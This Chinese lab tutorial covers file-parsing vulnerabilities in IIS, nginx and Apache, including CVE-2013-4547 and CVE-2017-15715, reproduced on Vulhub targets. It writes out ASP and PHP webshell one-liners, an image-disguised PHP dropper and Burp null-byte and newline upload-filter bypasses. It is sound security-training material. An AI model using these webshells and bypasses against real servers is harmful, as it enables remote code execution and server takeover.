首页 > 其他分享 >常见文件解析漏洞

常见文件解析漏洞

时间:2024-12-22 22:30:12浏览次数:9  
标签:文件 asp 常见 漏洞 docker 解析 靶场 php

IIS解析漏洞

IIS6.X

#环境
Windows Server 2003

在iis6.x中,.asp文件夹中的任意文件都会被当做asp文件去执行

在默认网站里创建一个a.asp文件夹并创建一个1.jpg写进我们的asp代码

<%=now()%>
#asp一句话
<%eval request("h")%>

单独创建一个1.jpg发现并不能解析

在a.asp下被解析

在IIS 6 处理文件解析时,分号可以起到截断的效果。也就是说 shell.asp;.jpg会被服务器看成是

shell.asp。另外IIS6.0默认的可执行文件除了asp还包含 asa\cer\cdx

IIS7.X

在IIS7.0和IIS7.5版本下也存在解析漏洞,在默认Fast-CGI开启状况下,在⼀个文件路径/xx.jpg

后面加上/xx.php会将 /xx.jpg/xx.php 解析为 php 文件。

php.ini里的cgi.fix_pathinfo=1 开启

IIS7在Fast-CGI运行模式下

#环境
PHPstudy for IIS

配置 php.ini 文件,将 cgi.fix_pathinfo=1 注释取消掉;并重启

IIS -->配置网站-->处理程序映射-->PHPStudy_FastCGI -->请求限制 -->取消勾

然后在网站下创建我们的shell;并命名为1.jpg

去网站访问他

加上/.php就可以被解析为php文件

蚁剑连接一下

nginx解析漏洞

Vulhub靶场nginx

nginx_parsing

Nginx的文件解析漏洞...和IIS7.0的解析漏洞同样的原理,因为 cgi.fix_pathinfo=1 造成的解析漏洞

使用 1.jpg/.php 方式进行绕过

搭建doker容器

#搭建docker容器
yum install docker
yum install docker-compose
#确认是否安装成功
docker -v
#搭建Vulhub靶场
git clone https://github.com/vulhub/vulhub.git

搭好Vulhub靶场后

cd vulhub/nginx/nginx_parsing_vulnerability/
docker-compose up -d
#查看端口
docker ps

上传我们的图片马

获取路径后

去访问我们的图片马并在后面加上/.php

蚁剑测试连接

Vulhub靶场CVE-2013-4547x

#启动靶场
cd vulhub-master/nginx/CVE-2013-4547x //切换到靶机目录 
docker-compose build //创建环境
docker-compose up -d //打开环境

创建好后打开我们的靶场上传一张图片马

GIF89a
<?php fputs(fopen('h.php','w'),'<?php @eval($_POST["cmd"]);?>'); ?>

上传的时候打开我们的BP进行抓包

在文件名后写上

空格空格.php

并在hex处修改0x20 0x20把最后一个空格换成0x00;然后放行

我们去访问他

发现我们访问不进去这时候就用到我们BP再次抓包进行修改

去Hex把20改回我们的00

就能访问到我们的木马,但是这并不是我们木马的路径,用蚁剑连是连不上的

我们的代码会生成一个一句话我们去连接他就可以了

Apache解析漏洞

Vulhub靶场apache

apache_parsing

Apache HTTPD 支持⼀个文件拥有多个后缀,并为不同后缀执行不同的指令

在Apache1.x/2.x中Apache 解析文件的规则是从右到左开始判断解析,如果后缀名为不可识别文件解析,

就再往左判断。如 1.php.xxxxx

#搭建靶场
cd /vulhub/httpd/apache_parsing_vulnerability
docker-compose up -d
docker ps -a

无论我们的php在哪都会解析我们文件里的php代码

GIF89a
<?php fputs(fopen('h.php','w'),'<?php @eval($_POST["cmd"]);?>'); ?>

访问一下我们上传的文件

去访问一下h.php也是成功了

Vulhub靶场CVE-2017-15715

#搭建靶场
cd /Vulnhub/vulhub-master/httpd/CVE-2017-15715
docker-compose up -d

Apache HTTPD是⼀款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存

在⼀个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过⼀些服务器的安全

策略。

来到首页,上传文件会被拦截

BP抓一下包,在文件名后加一个空格;并把0x20改成0x0a

放行就成功上传;去访问一下我们的一句话

标签:文件,asp,常见,漏洞,docker,解析,靶场,php
From: https://blog.csdn.net/2302_80256359/article/details/144653875

相关文章

  • 文件包含漏洞(hackme和tomato靶机实战)
    hackme靶机1.扫描靶机IP靶机搭好后扫描我们靶机的IPnmap-O192.168.187.128/24扫描到靶机的IP后去访问他2.信息收集挨个访问后有文件上传的路径;uploads网站登录界面;login.php3.寻找薄弱点网页首页是个登录界面,注册个账号登录看看登录后的界面判断是......
  • HarmonyOS应用开发实战-开箱即用的首页页面构建与ArkTS解析【HarmonyOS 5.0(Next)】
    HarmonyOS应用开发实战-开箱即用的首页页面构建与ArkTS解析【HarmonyOS5.0(Next)】一、HarmonyOSNext5.0的优势AI能力:HarmonyOSNext5.0通过系统级AI能力,将AI下沉至操作系统并赋能给多个子系统,从而提升了应用的智能化体验。例如,小艺助手在HarmonyOSNext5.0中得到了显著增强......
  • 常见的编码方式及特征
    一、BASE编码1、Base64Base64是网络上最常见的用于传输8Bit字节码的编码方式之一,Base64就是一种基于64个可打印字符来表示二进制数据的方法。Base64,就是包括小写字母a-z、大写字母A-Z、数字0-9、符号"+“、”/"一共64个字符的字符集。(1)编码规则①把3个字节变成4个字节......
  • wiki 漏洞文库(跟踪最新漏洞情报,挖洞快人一步)
    声明B站泷羽sec笔记的只是方便各位师傅学习知识,以下网站只涉及学习内容,其他的都与本人无关,切莫逾越法律红线,否则后果自负。✍......
  • #渗透测试#漏洞挖掘#红蓝攻防#护网#sql注入介绍08-基于时间延迟的SQL注入(Time-Based S
    免责声明本教程仅为合法的教学目的而准备,严禁用于任何形式的违法犯罪活动及其他商业行为,在使用本教程前,您应确保该行为符合当地的法律法规,继续阅读即表示您需自行承担所有操作的后果,如有异议,请立即停止本文章阅读。目录一、基于时间延迟的SQL注入概述(一)原理(二)应用场景示......
  • 深入解析RuoYi框架中的DataScopeAspect:不同权限类型的SQL语句生成与作用
    目录AOP简介面向切面编程(AOP)的概念AOP在RuoYi框架中的应用DataScopeAspect类的作用类的功能切点选择权限检查​编辑在前端如何给不同的用户设置不同的权限实际代码示例控制层服务层Mapper层DataScopeAspect类1.全部权限2.自定义权限3. 本部门及以下权限4.仅......
  • Maxpooling 深度解析:原理、应用与优化
    引言在深度学习的世界里,卷积神经网络(CNN)已经成为图像识别、语音处理和自然语言处理等领域的核心模型。而Maxpooling作为CNN中的重要操作之一,通过下采样减少数据维度,在保留关键特征的同时显著降低计算复杂度。本文将深入探讨Maxpooling的原理、应用场景,并结合具体实例......
  • qemu源码解析【03】qom实例
    目录qemu源码解析【03】qom实例1.arm_sbcon_i2c实例qemu源码解析【03】qom实例qemu源码解析【总目录】1.arm_sbcon_i2c实例以hw/i2c/arm_sbcon_i2c.c代码为例,这个实例很简单,只用100行左右的代码,调用qemu系统接口实现了一个i2c硬件模拟先看include/hw/i2c/arm_sb......
  • qemu源码解析【00】qemu-wsl-host环境搭建
    目录qemu源码解析【00】qemu-wsl-host环境搭建2.源码编译和启动qemu3.使用vscode调试wslqemu源码解析【00】qemu-wsl-host环境搭建qemu源码解析【总目录】2.源码编译和启动qemu源码地址:https://gitlab.com/qemu-project/qemu.git根目录:mkdirbuild&cdbuild......
  • 【CVE-2024-56145】Craft CMS 漏洞利用工具
    ✨特点......